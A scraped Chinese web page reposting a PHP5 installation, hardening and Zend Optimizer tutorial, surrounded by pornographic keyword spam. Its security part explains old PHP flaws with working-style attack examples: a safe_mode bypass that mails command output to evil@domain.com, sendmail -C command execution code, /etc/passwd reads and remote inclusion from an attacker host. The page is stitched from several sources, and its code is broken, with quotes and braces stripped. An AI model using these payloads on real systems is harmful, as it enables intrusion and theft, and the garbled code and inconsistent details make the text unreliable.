亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 編程 > PHP > 正文

PHP5安裝配置和Zend Optimizer安裝教程

2020-03-24 19:12:15
字體:
來源:轉載
供稿:網(wǎng)友
1.首先下載PHP 5.2.5(http://www.php.net/downloads.php) 本文PHP安裝路徑取為c:/php2.下載后得到php-5.1.2-Win32.zip,直接全部接壓至c:/php/目錄即可得PHP文件存放目錄c:/php; 3.再將c:/php/下的所有dll文件拷到c:/Windows/system32(win2000系統(tǒng)為 c:/winnt/system32/)下,覆蓋已有的dll文件; 4.將php.ini-dist用記事本打開,利用記事本的查找功能搜索并修改: 搜索CODE:register_globals = Off將 Off 改成 On ,即得到register_globals = On; 注:這個對應PHP的html' target='_blank'>全局變量功能,考慮有很多PHP程序需要全局變量功能故打開,打開后請注意-PHP程序的嚴謹性,如果不需要推薦不修改保持默認Off狀態(tài) 再搜索CODE:extension_dir =并將其路徑指到你的 PHP 目錄下的 ext 目錄,修改為extension_dir = c:/php/ext 在c:/php下建立文件夾并命名為tmp 查找CODE:;upload_tmp_dir =將;upload_tmp_dir該行的注釋符,即前面的分號 ; 去掉,使該行在php.ini文檔中起作用。upload_tmp_dir是用來定義上傳文件存放的臨時路徑,在這里你還可以修改并給其定義一個絕對路徑,這里設置的目錄必須有讀寫權限。 這里我設置為upload_tmp_dir = c:/php/tmp (即前面建立的這個文件夾) 搜索找到CODE:;Windows Extensions將下面一些常用的項前面的;去掉 CODE:;extension=php_mbstring.dllCODE:;extension=php_curl.dllCODE:;extension=php_dbase.dllCODE:;extension=php_gd2.dll這個是用來支持GD庫的,一般需要,必選 CODE:;extension=php_ldap.dllCODE:extension=php_zip.dllCODE:;extension=php_mysql.dll去掉前面的 查找CODE:;session.save_path =去掉前面;號,本文這里將其設置置為 session.save_path = c:/php/tmp其他的你可以選擇需要的去掉前面的;然后將該文件另存為為php.ini到C:/Windows ( Windows 2000 下為 C:/WINNT)目錄下,注意更改文件后綴名為ini,得到C:/Windows/php.ini ( Windows 2000 下為 C:/WINNT/php.ini) 常用安全設置一、Web服務器安全 PHP其實不過是Web服務器的一個模塊功能,所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統(tǒng)安全,這樣就扯遠了,無窮無盡。PHP可以和各種Web服務器結合,這里也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現(xiàn)漏洞,受影響的也只有這個禁錮的系統(tǒng),不會危害實際系統(tǒng)。但是使用chroot的Apache后,給應用也會帶來一定的麻煩,比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現(xiàn)socket連接,這在效率上會稍微差一點。還有mail函數(shù)發(fā)送郵件也是個問題 因為php.ini里的: [mail function] ; For Win32 only. SMTP = localhost ; For Win32 only. sendmail_from = me@localhost.com 都是針對Win32平臺,所以需要在chroot環(huán)境下調整好sendmail。 二、PHP本身問題 1.遠程溢出 PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區(qū)溢出漏洞,而且攻擊程序已經(jīng)廣泛流傳,成功率非常高. 2.遠程拒絕服務 PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞,雖然不能獲得本地用戶權限,但是也 能造成拒絕服務。 3.safe_mode繞過漏洞 還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數(shù)繞過safe_mode限制執(zhí)行命令漏洞,4.0.5版本開始mail函數(shù)增加了第五個參數(shù),由于設計者考慮不周可以突破safe_mode的限制執(zhí)行命令。其中4.0.5版本突破非常簡單,只需用分號隔開后面加shell命令就可以了,比如存在PHP腳本evil.php: 執(zhí)行如下的URL: http://foo.com/evil.php?bar=;/usr/bin/id mail evil@domain.com 這將id執(zhí)行的結果發(fā)送給evil@domain.com。 對于4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數(shù),所以系統(tǒng)必須是使用sendmail。如下的代碼能夠突破safe_mode限制執(zhí)行命令: 注意,下面這兩個必須是不存在的, 或者它們的屬主和本腳本的屬主是一樣 $script= /tmp/script123 $cf= /tmp/cf123 $fd = fopen($cf, w fwrite($fd, OQ/tmp Sparse=0 R$* . chr(9) . $#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script fclose($fd); $fd = fopen($script, w fwrite($fd, rm -f $script $cf; fwrite($fd, $cmd); fclose($fd); mail( nobody , , , , -C$cf 還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本,這樣才能消除基本的安全問題。 三、PHP本身的安全配置 PHP的配置非常靈活,可以通過php.ini, httpd.conf, .htaccess文件(該目錄必須設置了AllowOverride All或Options)進行設置,還可以在腳本程序里使用ini_set()及其他的特定的函數(shù)進行設置。通過phpinfo()和get_cfg_var()函數(shù)可以得到配置選項的各個值。 如果配置選項是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之后必須重啟apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效,httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。 如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置,也可以通過在腳本程序自身用ini_set()函數(shù)設定,它們修改的是Local值,改了以后馬上生效。但是.htaccess只對當前目錄的腳本程序生效,ini_set()函數(shù)只對該腳本程序設置ini_set()函數(shù)以后的代碼生效。各個版本的選項屬性可能不盡相同,可以用如下命令查找當前源代碼的main.c文件得到所有的選項,以及它的屬性: grep PHP_INI_ /PHP_SRC/main/main.c 在討論PHP安全配置之前,應該好好了解PHP的safe_mode模式。 1.safe_mode safe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設置。要啟用safe_mode,只需修改 php.ini: safe_mode = On 或者修改httpd.conf,定義目錄: Options FollowSymLinks php_admin_value safe_mode 1 重啟apache后safe_mode就生效了。啟動safe_mode,會對許多PHP函數(shù)進行限制,特別是和系統(tǒng)相關的文件打開、命令執(zhí)行等函數(shù)。 所有操作文件的函數(shù)將只能操作與腳本UID相同的文件,比如test.php腳本的內容為: 幾個文件的屬性如下: ls -la total 13 drwxr-xr-x 2 root root 104 Jul 20 01:25 . drwxr-xr-x 16 root root 384 Jul 18 12:02 .. -rw-r--r-- 1 root root 4110 Oct 26 2002 index.html -rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php 在瀏覽器請求test.php會提示如下的錯誤信息: Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1 如果被操作文件所在目錄的UID和腳本UID一致,那么該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途,絕對禁止使用root做為php腳本的屬主,這樣就達不到safe_mode的效果了。 如果想將其放寬到GID比較,則打開 safe_mode_gid可以考慮只比較文件的GID,可以設置如下選項: safe_mode_gid = On 設置了safe_mode以后,所有命令執(zhí)行的函數(shù)將被限制只能執(zhí)行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls -l`這種執(zhí)行命令的方式會被禁止。如果確實需要調用其它程序,可以在php.ini做如下設置: safe_mode_exec_dir = /usr/local/php/exec 然后拷貝程序到該目錄,那么php腳本就可以用system等函數(shù)來執(zhí)行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統(tǒng)命令。 safe_mode_include_dir string 當從此目錄及其子目錄(目錄必須在 include_path 中或者用完整路徑來包含)包含文件時越過 UID/GID 檢查。 從 PHP 4.2.0 開始,本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑,而不只是一個目錄。 指定的限制實際上是一個前綴,而非一個目錄名。這也就是說 safe_mode_include_dir = /dir/incl 將允許訪問 /dir/include 和 /dir/incls ,如果它們存在。如果您希望將訪問控制在一個指定的目錄,那么請在結尾加上一個斜線, 例如: safe_mode_include_dir = /dir/incl/ 。 safe_mode_allowed_env_vars string 設置某些環(huán)境變量可能是潛在的安全缺口。本指令包含有一個逗號分隔的前綴列表。在安全模式下,用戶只能改變那些名字具有在這里提供的前綴的環(huán)境變量。默認情況下,用戶只能設置以 PHP_ 開頭的環(huán)境變量(例如 PHP_FOO = BAR)。 注: 如果本指令為空,PHP 將使用戶可以修改任何環(huán)境變量! safe_mode_protected_env_vars string 本指令包含有一個逗號分隔的環(huán)境變量的列表,最終用戶不能用 putenv() 來改變這些環(huán)境變量。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變量。雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應用帶來影響,所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數(shù)可以參考PHP手冊。 討論完safe_mode后,下面結合程序代碼實際可能出現(xiàn)的問題討論如何通過對PHP服務器端的配置來避免出現(xiàn)的漏洞。 2、變量濫用 PHP默認register_globals = On,對于GET, POST, Cookie, Environment, Session的變量可以直接注冊成全局變量。它們的注冊順序是variables_order = EGPCS (可以通過php.ini修改),同名變量variables_order右邊的覆蓋左邊,所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習慣,像如下的程序片斷就極易受到攻擊: //test_1.php if ($pass == hello ) $auth = 1; if ($auth == 1) echo some important information else echo nothing 攻擊者只需用如下的請求就能繞過檢查: http://victim/test_1.php?auth=1 這雖然是一個很弱智的錯誤,但一些著名的程序也有犯過這種錯誤,比如phpnuke的遠程文件拷貝漏洞:http://www.securityfocus.com/bid/3361 PHP-4.1.0發(fā)布的時候建議關閉register_globals,并提供了7個特殊的數(shù)組變量來使用各種變量。對于從GET、POST、COOKIE等來的變量并不會直接注冊成變量,必需通過數(shù)組變量來存取。PHP-4.2.0發(fā)布的時候,php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值,一般為0,避免了攻擊者控制判斷變量。 解決方法: 配置文件php.ini設置register_globals = Off。要求程序員對作為判斷的變量在程序最開始初始化一個值。 3、文件打開 極易受攻擊的代碼片斷: //test_2.php if (!($str = readfile( $filename ))) { echo( Could not open file: $filenameexit; else { echo $str; 由于攻擊者可以指定任意的$filename,攻擊者用如下的請求就可以看到/etc/passwd: http://victim/test_2.php?filename=/etc/passwd如下請求可以讀php文件本身: http://victim/test_2.php?filename=test_2.php PHP中文件打開函數(shù)還有fopen(), file()等,如果對文件名變量檢查不嚴就會造成服務器重要文件被訪問讀取。 解決方法: 如非特殊需要,把php的文件操作限制在web目錄里面。以下是修改apache配置文件httpd.conf的一個例子: php_admin_value open_basedir /usr/local/apache/htdocs 重啟apache后,/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了,否則PHP就會報錯: Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx. 使用safe_mode模式也能避免這種問題,前面已經(jīng)討論過了。 4、包含文件 極易受攻擊的代碼片斷: //test_3.php if(file_exists($filename)) include( $filename 這種不負責任的代碼會造成相當大的危害,攻擊者用如下請求可以得到/etc/passwd文件: http://victim/test_3.php?filename=/etc/passwd 如果對于Unix版的PHP(Win版的PHP不支持遠程打開文件)攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件,如http://attack/attack.txt 的內容是,那么如下的請求就可以在目標主機執(zhí)行命令ls /etc: http://victim/test_3.php?filename=http://attack/attack.txt 攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執(zhí)行命令的代碼,不過由于干擾信息太多,有時不易成功。 對于另外一種形式,如下代碼片斷: //test_4.php include( $lib/config.php 攻擊者可以在自己的主機建立一個包含執(zhí)行命令代碼的config.php文件,然后用如下請求也可以在目標主機執(zhí)行命令: http://victim/test_4.php?lib=http://attack PHP的包含函數(shù)有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴就會對系統(tǒng)造成嚴重危險,可以遠程執(zhí)行命令。 解決方法: 要求程序員包含文件里的參數(shù)盡量不要使用變量,如果使用變量,就一定要嚴格檢查要包含的文件名,絕對不能由用戶任意指定。 如前面文件打開中限制PHP操作路徑是一個必要的選項。另外,如非特殊需要,一定要關閉PHP的遠程文件打開功能。修改php.ini文件: allow_url_fopen = Off 重啟apache。 5、文件上傳 php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄(默認是系統(tǒng)的臨時目錄,如:/tmp)里的一個類似phpxXuoXG的隨機臨時文件,程序執(zhí)行結束,該臨時文件也被刪除。PHP給上傳的文件定義了四個變量:(如form變量名是file,而且register_globals打開) $file #就是保存到服務器端的臨時文件(如/tmp/phpxXuoXG ) $file_size #上傳文件的大小 $file_name #上傳文件的原始名稱 $file_type #上傳文件的類型 推薦使用: $HTTP_POST_FILES['file']['tmp_name'] $HTTP_POST_FILES['file']['size'] $HTTP_POST_FILES['file']['name'] $HTTP_POST_FILES['file']['type'] 這是一個最簡單的文件上傳代碼: //test_5.php if(isset($upload) $file!= none ) { copy($file, /usr/local/apache/htdocs/upload/ .$file_name); echo 文件 .$file_name. 上傳成功!點擊繼續(xù)上傳 exit; content= text/html; charset=gb2312 這樣的上傳代碼存在讀取任意文件和執(zhí)行命令的重大問題。
常用性能設置一、我們編輯/etc/php5/apache2/php.ini文件,先做一般配置,在改動之前,請先將該配置文件做個備份。以便在出錯的時候可以恢復。
memory_limit = 8M = 修改成你所需的內存大小 upload_max_filesize = 2M = 修改文件最大上傳尺寸
extension=mysql.so 支持Mysql服務 extension=gd.so 支持gd函數(shù)
其實在Ubuntu下,如果你安裝了php5-mysql和php5-gd之后,會自動修改以上二行的,我們做的只不過是確認一下它們前面的注釋符是否去掉。 補充: 1.目前大多數(shù)php的open source都是用php4寫的,為了兼容以前的php版本,有時需要將register_long_arrays打開,否則$HTTP_GET_VARS和$HTTP_POST_VARS等變量將無法使用,會出現(xiàn)一些莫名其妙的問題。 2.另外,在裝完php5后最好確認一下/etc/apache2/mods-enabled/下是否有鏈接: php5.load - /etc/apache2/mods-available/php5.load
二、加固PHP,以增強安全性。 注意,下面的安全性要因情況而定,所以我已經(jīng)把它們的功能寫清楚了,如果有問題的話,看看是否由于下面哪種限制條件所造成,可相應將其注釋掉。 下面我們開始加固php,我們再次編輯/etc/php5/apache2/php.ini文件,之所以沒有一次改完,主要是為了給大家一個清晰的思路。 1.打開安全模式,打開他的好處就是PHP文件只能訪問所有者和PHP文件所有著一樣的文件,即使在chroot環(huán)境下也無法訪問jail中屬主不一樣的文件,類似于php shell這樣的后門就沒用武之地了哦,phpshell是很流行的php后門,他可以執(zhí)行系統(tǒng)命令,就象他的名字一樣,和shell很接近。 safe_mode = On 2.下面的設置就限制了fopen(), file()等函數(shù)可以操作的目錄范圍,避免了入侵者非法讀取文件,一定要在/var/www后面加 / ,否則/var/wwww下的文件也能被訪問 。該選項會禁止任何不在/var/www/目錄下的PHP文件運行,包括任何以軟鏈接方式鏈到/var/www/目錄下的程序,如PhpMyAdmin包,就在該選項設定后無法正常運行。 open_basedir = /var/www/ 3.禁止使用phpinfo和get_cfg_var函數(shù),這樣可以避免泄露服務信息,一般在在確認PHP能正常工作之后再使之關閉 disable_functions = phpinfo,get_cfg_var 4.設置php程序錯誤日志 error_reporting = E_ALL log_errors = On error_log = /var/log/php_err.log 5.如果php程序沒有指明需要register_globals的話,最好把register_globals設置為Off,這樣可以避免很多安全問題的。注意,如果你的程序是需要register_globals的話,可千萬別關。Ubuntu默認是關閉的。 register_globals = Off 6.禁止打開遠程地址,記得最近出的php include的那個漏洞嗎?就是在一個php程序中include了變量,那么入侵者就可以利用這個控制服務器在本地執(zhí)行遠程的一個php程序,例如phpshell,所以我們關閉這個。 allow_url_fopen = Off安裝 Zend Optimizer下載后得到 ZendOptimizer-3.3.0a-Windows-i386.exe,直接雙擊安裝即可,安裝過程要你選擇 Web Server 時,選擇 Apache 2.x ,然后提示你是否 Restart Web Server,選擇是,完成安裝之前提示是否備份 php.ini ,點確定后安裝完成。我這里安裝到c:/php5/Zend,如圖4.1所示 圖 4.1 安裝路徑 圖 4.2 服務器類型 圖 4.3 php.ini所在目錄 圖 4.4 Apache所在目錄 圖 4.5 完整安裝信息
Zend Optimizer 的安裝向導會自動根據(jù)你的選擇來修改 php.ini 幫助你啟動這個引擎。下面簡單介紹一下 Zend Optimizer 的配置選項。以下為本人安裝完成后 php.ini 里的默認配置代碼: Zend Optimizer 模塊在硬盤上的安裝路徑 zend_extension_ts= C:/php5/Zend/lib/ZendExtensionManager.dll 優(yōu)化器所在目錄,默認無須修改 zend_extension_manager.optimizer_ts= C:/php5/Zend/lib/Optimizer-3.3.0a 優(yōu)化程度,這里定義啟動多少個優(yōu)化過程,默認值是 15 ,表示同時開啟 10 個優(yōu)化過程中的 1-4 ,我們可以將這個值改為 1023 ,表示開啟全部10個優(yōu)化過程。 zend_optimizer.optimization_level=1023
調用phpinfo()函數(shù)后顯示: Zend Engine v1.3.0, Copyright (c) 1998-2004 Zend Technologies with Zend Extension Manager v1.0.9, Copyright (c) 2003-2006, by Zend Technologies with Zend Optimizer v3.3.0a, Copyright (c) 1998-2006, by Zend Technologies 則表示安裝成功。 取自 http://wiki.lupaworld.com/index.php/PHP_5.xhtml教程

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
yy1111111| 色婷婷综合网站| 日韩网站在线免费观看| 亚洲精品aa| 亚洲精品男人的天堂| 亚洲欧美在线人成swag| 欧美影院一区二区| 99国产牛牛视频在线网站| 国产九九在线视频| 国产精品一区二区三区不卡| 日本高清在线观看wwwww色| 全亚洲最色的网站在线观看| 伊人国产在线看一| 青青艹在线视频| 麻豆网站视频在线观看| 国产情侣一区二区| 国产精品毛片久久久久久久| 国产有码在线| 毛片免费看不卡网站| 91国内视频| 国产成人高清精品| 俺去亚洲欧洲欧美日韩| 神马影院午夜我不卡| www..com.cn蕾丝视频在线观看免费版| 国产精品va视频| 亚洲一级免费毛片| 亚洲精品.com| 日韩亚洲国产免费| 男人天堂综合| 少妇高潮一区二区三区| 啦啦啦中文在线观看日本| 男人午夜视频| 亚洲高清视频网站| 亚洲国产福利视频| 国产成人福利在线| 欧美xxxx做受欧美88bbw| 成人看片黄a免费看视频| 天天噜夜夜操| 9191国语精品高清在线| 加勒比海盗1在线观看免费国语版| 中文字幕精品三级久久久| 在线观看亚洲黄色| av黄色网址| 熟妇人妻中文av无码| 黄色录像a级片| 亚洲永久免费网站| 久久成人av| 要久久电视剧全集免费| 日韩黄色视屏| 成人亚洲欧美一区二区三区| 桃乃木かなav在线播放| 午夜精品久久久久久久蜜桃app| 欧美日韩综合| 日韩电影一区二区三区| 国产精品一区三区| 国产一区二区视频在线观看免费| 日韩精品在线私人| 久久精品午夜一区二区福利| 日韩伦理片在线观看| 成人免费网站www网站高清| 亚洲深夜福利| 国产亚洲成av人片在线观看桃| 日韩av大片在线观看| 欧美成人福利| 日韩毛片在线视频| 97久久精品人人澡人人爽缅北| 亚洲四虎av| 国产精品白丝一区二区三区| 欧类av怡春院| 欧美欧美欧美欧美首页| 国产无码精品一区二区| 色综合久久综合中文综合网| 蜜臀av性久久久久蜜臀av| 久久精品日产第一区二区三区| 不卡视频在线播放| 中文字幕人成一区| 天海翼一区二区三区免费| 午夜精品久久久久99热蜜桃导演| 182在线观看视频| 欧美日韩水蜜桃| 成人免费视频网站入口::| 国产一区二区三区不卡免费观看| 亚洲欧美色一区| 99日韩精品| 日本成人黄色| 亚洲视频在线观看免费| 9191在线视频| 国产视频精品久久| 美女精品一区最新中文字幕一区二区三区| 欧美国产激情一区二区三区蜜月| 国产一级免费黄色片| 亚洲一区二区三区四区五区六区| 欧美日韩视频免费| 久久夜色精品国产欧美乱| 欧美日韩中文另类| 午夜剧场免费看| 91精品短视频| 亚洲综合在线第一页| 在线观看h视频| 国产精品视频一二三四区| 亚洲女同在线| 男人插入女人视频| 亚洲成年人电影在线观看| 在线小视频网址| 国产精品入口| 91久久久久久久久久久久久久| 91色精品视频在线| 亚洲欧美日韩在线观看a三区| 亚洲风情亚aⅴ在线发布| 日日狠狠久久偷偷综合色| ·天天天天操| 国产一区二区三区影视| 精品久久99| 粉嫩aⅴ一区二区三区四区| 亚洲天堂国产视频| 永久555www成人免费| 黄色网在线播放| 国产又色又爽又黄刺激在线视频| 亚洲激情图片qvod| 在线电影一区二区三区| 日韩一区二区在线看片| 麻豆av一区二区三区久久| 日韩女优一区二区| 日韩一区二区三区四区五区六区| 9l视频自拍蝌蚪9l视频成人| 日日碰狠狠添天天爽超碰97| 国产成人在线视频播放| a级片在线视频| 国产精品免费看片| 91视频免费观看网站| 亚洲欧美激情另类校园| 成人三级av在线| 女海盗2成人h版中文字幕| 久热在线中文字幕色999舞| 国产粉嫩在线观看| 欧美性猛交xxxx久久久| 成人黄色网址在线观看| bbw在线视频| 中文字幕avav| 天堂av资源网| 伊人色综合久久久天天蜜桃| 国模杨依粉嫩蝴蝶150p| 欧美日韩国产中文精品字幕自在自线| 日韩精品―中文字幕| a级大片免费看| 激情五月综合色婷婷一区二区| 欧美激情视频一区二区三区不卡| 手机在线色视频| 亚洲不卡1卡2卡三卡2021麻豆| 欧美三级小视频| 一级欧美一级日韩片| 久久国产精品久久精品国产| 精品日韩视频| 天天躁日日躁aaaa视频| 国产九色91| 久久免费视频在线| 久久国产综合视频| 日本网站在线看| 超碰在线中文| 中文字幕av影院| 美日韩一级片在线观看| 已婚少妇美妙人妻系列| 无码国产69精品久久久久同性| 欧美性xxxx18| 日韩中文字幕区一区有砖一区| 红桃视频一区二区三区免费| 精品少妇人妻一区二区黑料社区| 亚洲男人的天堂在线视频| 日韩欧美激情| 国产精品久久久久久久泡妞| 亚洲精品乱码久久久久久动漫| 免费高潮视频95在线观看网站| 一个人免费观看在线视频www| 欧美黄色性生活| 五月婷婷综合激情网| 天堂网中文字幕| 图片区乱熟图片区亚洲| 成人污污www网站免费丝瓜| 日韩五码在线| 特黄国产免费播放| 男人c女人视频| 视频一区视频二区在线观看| 无码一区二区三区| 国产精品久久人| 在线视频一区二区三区四区| 蜜臀久久久久久999| 国产一区二区丝袜| 粉嫩老牛aⅴ一区二区三区| 国产偷人妻精品一区| 色天天综合网| 国产欧美日韩免费看aⅴ视频| 国产精品久久亚洲7777| 亚洲GV成人无码久久精品| 国产精品815.cc红桃| 天天干天天色综合| 国产精品丝袜久久久久久不卡| av电影在线播放| 91精东传媒理伦片在线观看| www黄色在线| 国产资源在线一区| 欧美一级在线免费观看| 久久亚洲精品伦理| 欧美少妇bbw| 富二代精品短视频| 亚洲国产精品网站| 国产日韩精品一区二区浪潮av| 岛国av免费在线观看| 久久国产精品免费精品3p| 亚洲天堂男人天堂| 亚洲字幕一区二区| 亚洲日韩成人| 欧美国产高潮xxxx1819| 免费看美女隐私的视频| 成人高潮aa毛片免费| 日本成人在线视频网址| 波多野结衣av一区二区全免费观看| 播放灌醉水嫩大学生国内精品| 黄色在线播放网站| 国产伦精品一区二区三区视频小说| h在线观看视频| 波多野结衣av一区二区全免费观看| 日韩精品免费在线| 日本在线视频中文字幕| 亚洲成人精选| ww亚洲ww在线观看国产| 亚洲图片欧美| 又色又爽又黄无遮挡的免费视频| 天天爱天天干天天操| 一道本在线免费视频| 亚洲裸体俱乐部裸体舞表演av| 欧美h片在线观看| 欧美成年人视频网站| 一区二区三区免费在线观看| 欧美国产在线观看| 99精品国产在热久久婷婷| 日本系列第一页| 久久露脸国产精品| 日韩高清成人在线| 杨幂毛片午夜性生毛片| 影音先锋在线中文| 你懂得影院夜精品a| 麻豆tv在线观看| 日韩三级在线播放| 91中文在线视频| 日韩在线视频免费播放| 91日韩一区二区三区| 国产精品视频在线观看免费| 香蕉av777xxx色综合一区| 91tv官网精品成人亚洲| bl动漫在线观看| 国产精品免费在线播放| 99久久国产综合精品麻豆| 国产探花在线免费观看| 7777kkkk成人观看| 色88久久久久高潮综合影院| 精品国产123区| 天堂在线中文| 亚洲黄色小视频| 久久男人av资源网站| 日韩电影网在线| 成人亚洲欧美一区二区三区| 91美女在线观看| 国产欧美一区二| 三级黄在线观看| 午夜性福利视频| 777久久久精品一区二区三区| 欧美电影《轻佻寡妇》| 91精品国产高清久久久久久| 久久久国产精品午夜一区ai换脸| 天天碰免费视频| 五月天婷亚洲天综合网精品偷| 91手机在线播放| 亚洲免费视频在线观看| 亚洲电影二区| 一级毛片在线观| 岛国精品在线观看| 日本视频www色| 国产精品免费观看| 成人性生活av| 538prom精品视频线放| 强制高潮抽搐sm调教高h| www.污视频| 青青草免费观看免费视频在线| 成人免费视频网站入口| hd国产人妖ts另类视频| 亚洲成人中文在线| 国产福利视频在线观看| 国产成人亚洲精品乱码在线观看| 亚洲精品一区二区三区影院忠贞| 中文在线а天堂av| 欧美黄色成人网| 免费无码毛片一区二区app| 欧美一个色资源| 欧美色图另类小说| 在线免费电影观看| 欧美在线视频一区二区| 精品国产自在久精品国产| 亚洲黄色免费电影| 91九色蝌蚪| 在线观看成人免费视频| 日韩啪啪电影网| 欧美精品亚洲精品| 日韩毛片在线视频| 7777女厕盗摄久久久| 一区二区精彩视频| 热re99久久精品国产99热| 日韩理论片中文av| 亚洲精品视频在线免费| 中文字幕第五页| 日韩乱码人妻无码中文字幕久久| 亚洲精品免费网站| 我和岳m愉情xxxⅹ视频| 岛国片在线免费观看| 久久精品午夜福利| 天堂资源在线观看| 免费精品国产自产拍在| 日韩av一区二区三区在线| 亚洲а∨精品天堂在线| 国产精品视频免费一区| 欧美三级电影在线看| 欧美人与禽zozo性伦| 国产揄拍国内精品对白| 被男同事摸的水好多| 综合久久成人| 欧美刺激脚交jootjob| 欧美激情视频一区二区| 亚洲视频一区二区在线| 成人av网站在线|